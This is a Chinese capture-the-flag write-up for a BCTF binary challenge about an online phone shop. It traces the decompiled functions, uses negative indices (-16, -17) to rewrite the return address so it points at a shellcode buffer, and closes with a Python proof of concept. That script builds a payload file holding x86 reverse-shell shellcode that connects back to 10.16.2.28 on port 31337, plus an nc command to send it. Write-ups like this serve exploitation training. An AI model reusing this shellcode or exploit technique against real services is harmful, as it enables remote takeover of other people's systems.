身无分文: 200
描述
米特尼克在BAT上班时,发现很多同事都在用新款Android手机,很是羡慕,他也想搞一部,来替换他那部用了“二十多年”的摩托罗拉手机。但是他在BAT公司还没拿到第一笔工资,用假身份申请的信用卡在租房与日常饮食上也快刷爆了,可以说是身无分文了。这却难不倒米特尼克,他发现了这个销售手机的在线商店。商店地址:218.2.197.251:1234 http://bctf.cn/files/downloads/mobile_shop_4d904f700ef95bae39936cd9c0829d31
程序界面:
做这种题可以先将 函数流程理出来就好做了
int __cdecl sub_8048C00() 主功能函数{
sub_8048840((int)&v4); 漏洞函数 -》
signed int __cdecl sub_8048A30(int a1)(
函数中明显有一个 sub_80486F0((int)&unk_804B1E0, 200, 10 明显200字节是装载shellcode的)
)
}
int __cdecl sub_8048C00()
{
char *v0; // eax@1
signed int v1; // eax@4
int result; // eax@10
char v3; // [sp+13h] [bp-19h]@2
char arr; // [sp+14h] [bp-18h]@14
char v5; // [sp+1Bh] [bp-11h]@1
int v6; // [sp+1Ch] [bp-10h]@1可以看到主函数 sub_8048C00 的返回地址肯定比 arr字符串的地址高,所以可以修改返回地址
可以发现漏洞点:
sub_8048C00 主功能函数
返回地址 :0804859e
修改为 0804B1E0
输入 " -17"可以85 ++ (0xb1-0x85)次
输入 " -16"可以9e ++ (0xe0-0x9e)次
EDB看到:
GDB可以看到:
最后
nc 218.2.197.251:1234 1234 < payload.txt 即可获得shell
POC:
shellcode = (
#define IPADDR '\x0a\x10\x02\x1c' 10.16.2.28
#define PORT '\x7a\x69'
'\x31\xc0\x31\xdb\x31\xc9\x31\xd2'
'\xb0\x66\xb3\x01\x51\x6a\x06\x6a'
'\x01\x6a\x02\x89\xe1\xcd\x80\x89'
'\xc6\xb0\x66\x31\xdb\xb3\x02\x68'
#IPADDR
'\x0a\x10\x02\x1c'
'\x66\x68'
#PORT
'\x7a\x69'
'\x66\x53\xfe'
'\xc3\x89\xe1\x6a\x10\x51\x56\x89'
'\xe1\xcd\x80\x31\xc9\xb1\x03\xfe'
'\xc9\xb0\x3f\xcd\x80\x75\xf8\x31'
'\xc0\x52\x68\x6e\x2f\x73\x68\x68'
'\x2f\x2f\x62\x69\x89\xe3\x52\x53'
'\x89\xe1\x52\x89\xe2\xb0\x0b\xcd'
'\x80\x90'
)
data = ''
data += 'a\n -16\n'*(0xe0-0x9e)
data += 'a\n -17\n'*(0xb1-0x85)
data += 'a\n1\n'
data += 'c\ny\n'
data += 'name\n'
data += shellcode+'\n'
data += 'd\n'
open('payload.txt','w').write(data)
import binascii
print repr(binascii.hexlify(data))
